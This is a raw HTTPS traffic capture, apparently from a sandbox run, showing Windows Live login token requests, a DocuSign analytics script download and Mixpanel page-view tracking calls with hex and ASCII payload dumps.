2024-10-29 17:45:03 UTC	422	OUT	POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 3592 Host: login.live.com
2024-10-29 17:45:03 UTC	3592	OUT	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-10-29 17:45:03 UTC	569	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/soap+xml; charset=utf-8 Expires: Tue, 29 Oct 2024 17:44:03 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C538_BL2 x-ms-request-id: e7b5d94f-a203-4681-afff-b46b4c15f8fd PPServer: PPV: 30 H: BL02EPF00027837 V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Tue, 29 Oct 2024 17:45:03 GMT Connection: close Content-Length: 11392
2024-10-29 17:45:03 UTC	11392	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200

Timestamp	Bytes transferred	Direction	Data
2024-10-29 17:45:04 UTC	422	OUT	POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 4775 Host: login.live.com
2024-10-29 17:45:04 UTC	4775	OUT	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-10-29 17:45:05 UTC	569	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/soap+xml; charset=utf-8 Expires: Tue, 29 Oct 2024 17:44:05 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C538_SN1 x-ms-request-id: 60e5ba41-048b-48fb-b6d7-840dad9ce7df PPServer: PPV: 30 H: SN1PEPF0002F8FA V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Tue, 29 Oct 2024 17:45:05 GMT Connection: close Content-Length: 11412
2024-10-29 17:45:05 UTC	11412	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200

Timestamp	Bytes transferred	Direction	Data
2024-10-29 17:45:07 UTC	422	OUT	POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 4775 Host: login.live.com
2024-10-29 17:45:07 UTC	4775	OUT	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-10-29 17:45:07 UTC	569	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/soap+xml; charset=utf-8 Expires: Tue, 29 Oct 2024 17:44:07 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C538_BL2 x-ms-request-id: c18fd5ab-0b29-475d-baf1-6dc8760b4b4f PPServer: PPV: 30 H: BL02EPF0001D9FA V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Tue, 29 Oct 2024 17:45:06 GMT Connection: close Content-Length: 11412
2024-10-29 17:45:07 UTC	11412	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200

Timestamp	Bytes transferred	Direction	Data
2024-10-29 17:45:08 UTC	422	OUT	POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 4762 Host: login.live.com
2024-10-29 17:45:08 UTC	4762	OUT	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-10-29 17:45:09 UTC	569	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/soap+xml; charset=utf-8 Expires: Tue, 29 Oct 2024 17:44:08 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C538_BL2 x-ms-request-id: 6dcb3249-c315-42a9-a67b-107b8d07174b PPServer: PPV: 30 H: BL02EPF0001D8FE V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Tue, 29 Oct 2024 17:45:08 GMT Connection: close Content-Length: 10197
2024-10-29 17:45:09 UTC	10197	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200

Timestamp	Bytes transferred	Direction	Data
2024-10-29 17:45:14 UTC	539	OUT	GET /ds_arya_wrapper.min.js?f=1 HTTP/1.1 Host: a.docusign.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://eu.docusign.net/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-29 17:45:15 UTC	313	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 17:45:14 GMT Content-Length: 631 Connection: close Server: DS-Arya Expires: Wed, 30 Oct 2024 17:45:14 GMT Cache-Control: max-age=86400 Set-Cookie: ds_a=cd6c8418-b7c8-4e41-b700-1d78e22b3590;Domain=.docusign.com;Max-Age=63072000;SameSite=None;Secure;Path=/;HttpOnly
2024-10-29 17:45:15 UTC	631	IN	Data Raw: 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 75 3d 74 68 69 73 3b 21 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 2c 69 2c 66 2c 72 2c 65 2c 6f 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 29 72 65 74 75 72 6e 20 64 65 66 69 6e 65 28 6f 29 3b 66 26 26 66 5b 72 5d 3f 66 5b 72 5d 3d 6f 28 6e 2c 30 2c 21 30 2c 66 2c 72 2c 65 29 3a 75 5b 6e 5d 3d 6f 28 6e 2c 30 2c 21 30 2c 66 2c 72 2c 65 29 7d 28 22 44 53 5f 41 72 79 61 22 2c 30 2c 30 2c 75 2e 6d 6f 64 75 6c 65 2c 22 65 78 70 6f 72 74 73 22 2c 22 6c 65 6e 67 74 68 22 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 69 2c 6e 2c 66 2c 72 2c 65 2c 6f 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 75 3d 7b 7d 2c 63 3d 28 73 28 66 75 6e 63 74 Data Ascii: (function(){var u=this;!function(n,t,i,f,r,e,o){if("function"==typeof define&&define.amd)return define(o);f&&f[r]?f[r]=o(n,0,!0,f,r,e):u[n]=o(n,0,!0,f,r,e)}("DS_Arya",0,0,u.module,"exports","length",function(t,i,n,f,r,e,o){"use strict";var u={},c=(s(funct

Timestamp	Bytes transferred	Direction	Data
2024-10-29 17:45:15 UTC	415	OUT	GET /ds_arya_wrapper.min.js?f=1 HTTP/1.1 Host: a.docusign.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: ds_a=cd6c8418-b7c8-4e41-b700-1d78e22b3590
2024-10-29 17:45:16 UTC	313	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 17:45:16 GMT Content-Length: 631 Connection: close Server: DS-Arya Expires: Wed, 30 Oct 2024 17:45:16 GMT Cache-Control: max-age=86400 Set-Cookie: ds_a=cd6c8418-b7c8-4e41-b700-1d78e22b3590;Domain=.docusign.com;Max-Age=63072000;SameSite=None;Secure;Path=/;HttpOnly
2024-10-29 17:45:16 UTC	631	IN	Data Raw: 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 75 3d 74 68 69 73 3b 21 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 2c 69 2c 66 2c 72 2c 65 2c 6f 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 29 72 65 74 75 72 6e 20 64 65 66 69 6e 65 28 6f 29 3b 66 26 26 66 5b 72 5d 3f 66 5b 72 5d 3d 6f 28 6e 2c 30 2c 21 30 2c 66 2c 72 2c 65 29 3a 75 5b 6e 5d 3d 6f 28 6e 2c 30 2c 21 30 2c 66 2c 72 2c 65 29 7d 28 22 44 53 5f 41 72 79 61 22 2c 30 2c 30 2c 75 2e 6d 6f 64 75 6c 65 2c 22 65 78 70 6f 72 74 73 22 2c 22 6c 65 6e 67 74 68 22 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 69 2c 6e 2c 66 2c 72 2c 65 2c 6f 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 75 3d 7b 7d 2c 63 3d 28 73 28 66 75 6e 63 74 Data Ascii: (function(){var u=this;!function(n,t,i,f,r,e,o){if("function"==typeof define&&define.amd)return define(o);f&&f[r]?f[r]=o(n,0,!0,f,r,e):u[n]=o(n,0,!0,f,r,e)}("DS_Arya",0,0,u.module,"exports","length",function(t,i,n,f,r,e,o){"use strict";var u={},c=(s(funct

Timestamp	Bytes transferred	Direction	Data
2024-10-29 17:45:16 UTC	1191	OUT	GET /track/?data=eyJldmVudCI6ICJtcF9wYWdlX3ZpZXciLCJwcm9wZXJ0aWVzIjogeyIkb3MiOiAiV2luZG93cyIsIiRicm93c2VyIjogIkNocm9tZSIsIiRyZWZlcnJpbmdfZG9tYWluIjogImV1LmRvY3VzaWduLm5ldCIsIiRzY3JlZW5faGVpZ2h0IjogMTAyNCwiJHNjcmVlbl93aWR0aCI6IDEyODAsIm1wX2xpYiI6ICJ3ZWIiLCJkaXN0aW5jdF9pZCI6ICIxOTJkOTYxYzEwNzY5NS0wOWFjYjQ3NGRiYWEzZi0yNjAzMWU1MS0xNDAwMDAtMTkyZDk2MWMxMDg2ZDciLCIkaW5pdGlhbF9yZWZlcnJpbmdfZG9tYWluIjogImV1LmRvY3VzaWduLm5ldCIsIm1wX3BhZ2UiOiAiZXUuZG9jdXNpZ24ubmV0IiwibXBfcmVmZXJyZXIiOiAiZXUuZG9jdXNpZ24ubmV0IiwibXBfYnJvd3NlciI6ICJDaHJvbWUiLCJtcF9wbGF0Zm9ybSI6ICJXaW5kb3dzIiwidG9rZW4iOiAiMzA0Y2NiZGUyNGQzYjE1ZmZlMmQ1ZGUzMGMxMGRhYjIifX0%3D&ip=1&_=1730223915277 HTTP/1.1 Host: api.mixpanel.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Origin: https://eu.docusign.net Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://eu.docusign.net/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-29 17:45:16 UTC	529	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Access-Control-Allow-Headers: X-Requested-With Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Allow-Origin: https://eu.docusign.net Access-Control-Expose-Headers: X-MP-CE-Backoff Access-Control-Max-Age: 1728000 Cache-Control: no-cache, no-store Content-Type: application/json Strict-Transport-Security: max-age=604800; includeSubDomains Date: Tue, 29 Oct 2024 17:45:16 GMT Content-Length: 1 Via: 1.1 google Alt-Svc: clear Connection: close
2024-10-29 17:45:16 UTC	1	IN	Data Raw: 31 Data Ascii: 1

Timestamp	Bytes transferred	Direction	Data
2024-10-29 17:45:16 UTC	1193	OUT	GET /track/?data=eyJldmVudCI6ICJtcF9wYWdlX3ZpZXciLCJwcm9wZXJ0aWVzIjogeyIkb3MiOiAiV2luZG93cyIsIiRicm93c2VyIjogIkNocm9tZSIsIiRyZWZlcnJpbmdfZG9tYWluIjogImV1LmRvY3VzaWduLm5ldCIsIiRzY3JlZW5faGVpZ2h0IjogMTAyNCwiJHNjcmVlbl93aWR0aCI6IDEyODAsIm1wX2xpYiI6ICJ3ZWIiLCJkaXN0aW5jdF9pZCI6ICIxOTJkOTYxYzEwYTQ0Mi0wNGYyZjVjYTQ1YjliLTI2MDMxZTUxLTE0MDAwMC0xOTJkOTYxYzEwYjU5NiIsIiRpbml0aWFsX3JlZmVycmluZ19kb21haW4iOiAiZXUuZG9jdXNpZ24ubmV0IiwibXBfcGFnZSI6ICJldS5kb2N1c2lnbi5uZXQiLCJtcF9yZWZlcnJlciI6ICJldS5kb2N1c2lnbi5uZXQiLCJtcF9icm93c2VyIjogIkNocm9tZSIsIm1wX3BsYXRmb3JtIjogIldpbmRvd3MiLCJ0b2tlbiI6ICI2MjQ0YmI5ZTMxZGY2ZDhkY2Y4YzQxMzVkZWZlNjQ2MCJ9fQ%3D%3D&ip=1&_=1730223915278 HTTP/1.1 Host: api.mixpanel.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Origin: https://eu.docusign.net Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://eu.docusign.net/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-29 17:45:16 UTC	529	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Access-Control-Allow-Headers: X-Requested-With Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Allow-Origin: https://eu.docusign.net Access-Control-Expose-Headers: X-MP-CE-Backoff Access-Control-Max-Age: 1728000 Cache-Control: no-cache, no-store Content-Type: application/json Strict-Transport-Security: max-age=604800; includeSubDomains Date: Tue, 29 Oct 2024 17:45:16 GMT Content-Length: 1 Via: 1.1 google Alt-Svc: clear Connection: close
2024-10-29 17:45:16 UTC	1	IN	Data Raw: 31 Data Ascii: 1

Timestamp	Bytes transferred	Direction	Data
2024-10-29 17:45:17 UTC	987	OUT	GET /track/?data=eyJldmVudCI6ICJtcF9wYWdlX3ZpZXciLCJwcm9wZXJ0aWVzIjogeyIkb3MiOiAiV2luZG93cyIsIiRicm93c2VyIjogIkNocm9tZSIsIiRyZWZlcnJpbmdfZG9tYWluIjogImV1LmRvY3VzaWduLm5ldCIsIiRzY3JlZW5faGVpZ2h0IjogMTAyNCwiJHNjcmVlbl93aWR0aCI6IDEyODAsIm1wX2xpYiI6ICJ3ZWIiLCJkaXN0aW5jdF9pZCI6ICIxOTJkOTYxYzEwNzY5NS0wOWFjYjQ3NGRiYWEzZi0yNjAzMWU1MS0xNDAwMDAtMTkyZDk2MWMxMDg2ZDciLCIkaW5pdGlhbF9yZWZlcnJpbmdfZG9tYWluIjogImV1LmRvY3VzaWduLm5ldCIsIm1wX3BhZ2UiOiAiZXUuZG9jdXNpZ24ubmV0IiwibXBfcmVmZXJyZXIiOiAiZXUuZG9jdXNpZ24ubmV0IiwibXBfYnJvd3NlciI6ICJDaHJvbWUiLCJtcF9wbGF0Zm9ybSI6ICJXaW5kb3dzIiwidG9rZW4iOiAiMzA0Y2NiZGUyNGQzYjE1ZmZlMmQ1ZGUzMGMxMGRhYjIifX0%3D&ip=1&_=1730223915277 HTTP/1.1 Host: api.mixpanel.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
